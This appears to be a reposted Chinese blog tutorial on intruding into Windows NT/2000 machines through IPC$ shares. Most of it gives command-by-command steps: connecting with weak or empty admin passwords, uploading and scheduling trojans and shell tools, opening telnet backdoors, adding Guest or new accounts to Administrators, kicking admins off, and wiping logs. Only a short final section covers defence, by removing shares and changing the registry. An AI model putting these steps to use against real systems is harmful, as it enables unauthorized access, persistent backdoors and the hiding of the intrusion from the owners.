DOS入侵示例

    技术2022-05-11  72

    这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

      1. C:/>net use //127.0.0.1/IPC$ "密码" /user:"用户名"

      一般用流光,通过扫描弱口令来得到,管理员帐号和密码.

      2. C:/>copy srv.exe //127.0.0.1/admin$

      先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

        

      3. C:/>net time //127.0.0.1

      查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。

        

      4. C:/>at //127.0.0.1 11:05 srv.exe

      用at命令启动srv.exe吧

      5. C:/>net time //127.0.0.1

      再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。

        

      6. C:/>telnet 127.0.0.1 99

      这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

      虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

        

      7.C:/>copy ntlm.exe //127.0.0.1/admin$

      用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

        

      8. C:/WINNT/system32>ntlm

      输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

      9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

      为了以防万一,我们再把guest激活加到管理组

      10. C:/>net user guest /active:yes

      将对方的Guest用户激活

      11. C:/>net user guest 1234

      将Guest的密码改为1234,或者你要设定的密码

      12. C:/>net localgroup administrators guest /add

      将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算

      13.使用nb2的sql工具。远程执行dos命令

      net start telnet 开telnet服务

      net user mint mint /add 添加用户mint密码为mint

      net localgroup administrators mint /add 将帐号mint升级为管理员

      7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

      8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

      9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

      10,找到c:/winnt/system32/cmd.exe 建立一个快捷方式到桌面。

      11,修改cmd的快捷方式属性为允许其他身份登陆。

      12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

      13,telnet对方ip.直接可以登陆对方电脑了。

      使用命令

      c:/query user 查看对方目前终端登陆状况。

      运行命令

      c:/logoff 1 踢出去一个管理者

      再用c:/query user检查一便~~

      ok了

      14,使用3389远程终端登陆。

      入侵中可能会用到的相关命令

      请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

      1 建立空连接:

      net use //IP/ipc$ "" /user:""

      2 建立非空连接:

      net use //IP/ipc$ "psw" /user:"account"

      3 查看远程主机的共享资源(但看不到默认共享)

      net view //IP

      4 查看本地主机的共享资源(可以看到本地的默认共享)

      net share

      5 得到远程主机的用户名列表

      nbtstat -A IP

      6 得到本地主机的用户列表

      net user

      7 查看远程主机的当前时间

      net time //IP

      8 显示本地主机当前服务

      net start

      9 启动/关闭本地服务

      net start 服务名 /y

      net stop 服务名 /y

      10 映射远程共享:

      net use z: //IP/baby

      此命令将共享名为baby的共享资源映射到z盘

      11 删除共享映射

      net use c: /del 删除映射的c盘,其他盘类推

      net use * /del /y删除全部

      12 向远程主机复制文件

      copy /路径/srv.exe //IP/共享目录名,如:

      copy ccbirds.exe //*.*.*.*/c 即将当前目录下的文件复制到对方c盘内

      13 远程添加计划任务

      at //ip 时间 程序名,如:

      at //127.0.0.0 11:00 love.exe

      注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径

      14 开启远程主机的telnet

      这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

      1)目标开启了ipc$共享

      2)你要拥有管理员密码和帐号

      3)目标开启RemoteRegistry服务,用户就该ntlm认证

      4)对WIN2K/XP有效,NT未经测试

      命令格式:OpenTelnet.exe //server account psw NTLM认证方式 port

      试例如下:c:/>OpenTelnet.exe //*.*.*.* administrator "" 1 90

      15 激活用户/加入管理员组

      1 net uesr account /active:yes

      2 net localgroup administrators account /add

      16 关闭远程主机的telnet

      同样需要一个小程序:ResumeTelnet.exe

      命令格式:ResumeTelnet.exe //server account psw

      试例如下:c:/>ResumeTelnet.exe //*.*.*.* administrator ""

      17 删除一个已建立的ipc$连接

      net use //IP/ipc$ /del

      (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)

      十二 ipc$完整入侵步骤祥解

      其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

      1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空

      2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧

      3上面开telnet的命令没忘吧,要用到opentelnet这个小程序

      c:/>OpenTelnet.exe //192.168.21.* administrator "" 1 90

      如果返回如下信息

      *******************************************************

      Remote Telnet Configure, by refdom

      Email: refdom@263.net

      OpenTelnet.exe

      UsagepenTelnet.exe //server username password NTLMAuthor telnetport

      *******************************************************

      Connecting //192.168.21.*...Successfully!

      NOTICE!!!!!!

      The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

      Starting telnet service...

      telnet service is started successfully! telnet service is running!

      BINGLE!!!Yeah!!

      Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

      Disconnecting server...Successfully!

      *说明你已经打开了一个端口90的telnet。

      4 现在我们telnet上去

      telnet 192.168.21.* 90

      如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了

      5 C:/>net user guest /active:yes

      *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no

      6 C:/>net user guest 1234

      *将Guest的密码改为1234,或者改成你喜欢的密码

      7 C:/>net localgroup administrators guest /add

      *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。

      8 好了,现在我们来走另一条路,给它传个木马玩玩

      9 首先,我们先建立起ipc$连接

      C:/>net use //192.168.21.*/ipc$ "" /user:administrator

      10 既然要上传东西,就要先知道它开了什么共享

      C:/>net view //192.168.21.*

      在 //192.168.21.*的共享资源

      资源共享名 类型 用途 注释

      -----------------------------------------------------------

      C Disk

      D Disk

      命令成功完成。

      *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。

      11 C:/>copy love.exe //192.168.21.*/c

      已复制 1 个文件

      *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现

      12 运行木马前,我们先看看它现在的时间

      net time //192.168.21.*

      //192.168.21.*的当前时间是 2003/8/22 上午 11:00

      命令成功完成

      13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了

      C:/>at //192.168.21.* 11:02 c:/love.exe

      新加了一项作业,其作业 ID = 1

      14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了

      嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec //tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。

      讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

      1,怎样建立空连接,它有什么用?

      答:使用命令 net use /IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。

      对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。

      2.为什么我连不上IPC$?

      答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

      2.确认你的命令没有打错。正确的命令是: net use /目标IPipc$ "密码" /user:"用户名"

      注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

      3,根据返回的错误号分析原因:

      错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

      错误号51,Windows 无法找到网络路径 : 网络有问题;

      错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

      错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

      错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

      错误号1326,未知的用户名或错误密码 : 原因很明显了;

      错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

      错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

      4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。

      5,怎样打开目标的IPC$?

      答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

      6,怎样映射和访问默认共享?

      答:使用命令 net use z: /目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。

      如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe /IPd$pathmuma.exe 。或者再R射也可以,只是不用用户名和密码了:net use y: /IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。

      7,如何删除映射和ipc$连接?

      答:用命令 net use /IPipc$ /del 删除和一个目标的ipc$连接。

      用命令 net use z: /del 删除映射的z盘,其他盘类推。

      用命令 net use * /del 删除全部。会有提示要求按y确认。

      8,连上ipc$然后我能做什么?

      答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

      9,怎样防止别人用ips$和默认共享入侵我?

      答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

      1,先把已有的删除

      net share ipc$ /del

      net share admin$ /del

      net share c$ /del

      …………(有几个删几个)

      2,禁止别人空连接

        首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。

        3,禁止自动打开默认共享

        对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。

      对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。

      如果上面所说的主键不存在,就新建一个再改键值。

      B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)

      net stop lanmanserver

      可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

      C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。

      D、还有一个办法就是装防火墙,或者端口过滤。

      结束进程:ntsd -c q -p PID

     

    最新回复(0)